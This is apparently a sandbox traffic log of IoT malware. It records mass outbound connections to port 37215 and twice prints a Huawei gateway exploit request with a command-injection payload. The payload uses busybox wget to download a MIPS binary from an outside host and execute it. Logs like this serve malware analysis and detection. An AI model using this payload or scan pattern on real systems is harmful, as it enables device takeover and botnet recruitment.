              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.112.222.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.17.149.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.55.232.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.239.53.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.62.89.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.58.145.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.99.144.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.187.185.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.214.147.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.189.58.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.17.55.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.183.200.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.207.129.254:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.45.170.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.28.239.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.75.100.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.255.200.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.199.74.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.49.136.219:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.122.12.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.92.103.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.157.185.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.180.88.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.216.7.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.235.230.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.193.52.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.73.80.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.50.95.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.218.35.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.135.45.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.29.160.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.213.32.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.13.61.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.59.44.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.139.39.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.222.163.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.33.225.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.181.98.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.123.167.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.238.2.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.175.236.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.72.247.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.105.4.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.61.219.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.103.21.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.154.209.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.144.73.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.120.77.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.3.166.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.53.20.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.177.202.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.220.5.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.110.113.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.62.107.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.113.201.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.17.218.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.62.177.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.8.91.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.215.111.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.188.76.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.47.41.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.151.51.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.53.17.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.113.27.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.229.135.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.27.123.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.170.13.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.201.217.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.92.216.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.52.16.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.188.45.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.250.162.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.244.232.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.198.54.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.150.212.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.80.219.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.202.228.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.101.51.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.130.46.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.155.114.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.51.90.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.242.112.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.66.70.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.18.202.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.196.249.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.210.0.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.250.212.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.220.157.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.106.68.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.239.116.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.9.92.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.12.226.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.9.147.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.230.177.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.31.150.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.124.35.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.115.8.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.157.86.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:38570 -> 93.123.85.91:59666
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.53.5.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.226.222.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.208.52.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.45.7.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.252.82.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.81.74.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.2.157.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.166.23.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.56.186.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.123.160.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.202.222.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.235.247.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.103.120.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.248.64.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.70.143.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.164.181.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.242.87.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.136.132.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.98.224.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.61.61.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.33.55.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.144.122.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.68.5.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.73.133.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.5.108.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.21.240.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.237.60.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.243.17.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.13.215.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.22.75.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.134.24.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.220.33.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.64.162.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.75.10.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.20.2.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.40.29.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.62.134.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.56.89.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.33.139.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.221.155.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.117.178.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.245.111.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.97.128.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.165.237.107:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.243.210.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.185.59.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.116.208.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.14.207.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.160.184.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.173.23.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.234.148.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.87.36.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.249.108.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.113.128.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.102.44.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.177.242.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.212.109.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.224.249.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.251.249.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.87.127.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.68.184.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.252.235.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.251.33.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.140.59.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.213.235.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.31.24.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.51.141.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.60.45.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.130.236.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.83.9.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.121.162.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.178.210.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.46.92.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.13.18.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.15.25.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.61.236.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.228.20.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.26.0.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.203.144.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.157.191.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.15.199.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.188.54.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.19.234.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.211.143.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.250.159.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.236.119.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.127.25.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.210.131.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.185.201.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.251.48.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.49.189.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.249.223.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.100.98.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.185.144.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.107.168.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.62.33.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.187.134.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.7.161.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.167.71.146:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.101.95.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.69.67.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.107.202.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.226.231.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.62.111.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.166.104.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.96.34.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.202.108.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.62.131.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.222.74.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.191.201.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.251.162.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.154.136.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.58.35.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.105.147.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.244.37.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.31.92.166:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.247.9.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.188.150.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.155.148.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.198.14.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.225.147.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.99.210.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.13.65.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.41.126.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.199.54.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.171.6.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.185.52.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.180.20.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.201.93.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.50.46.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.138.242.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.2.187.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.89.197.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.150.49.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.205.7.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.13.119.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.209.127.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.119.194.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.56.35.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.220.52.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.105.163.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.4.155.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.73.52.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.86.93.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.243.21.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.184.16.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.242.49.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.16.251.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.82.219.49:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.70.48.46:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.48.39.219:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.91.252.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.137.90.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.38.137.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.219.85.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.229.199.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.73.109.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.46.188.75:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.215.168.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.232.74.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.76.242.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.56.224.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.142.121.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.207.186.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.54.38.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.144.217.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.42.90.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.95.33.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.150.103.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.147.104.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.44.118.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.31.9.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.39.59.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 197.166.170.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.160.149.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.110.175.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.156.176.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 41.176.200.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:24529 -> 156.94.107.248:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
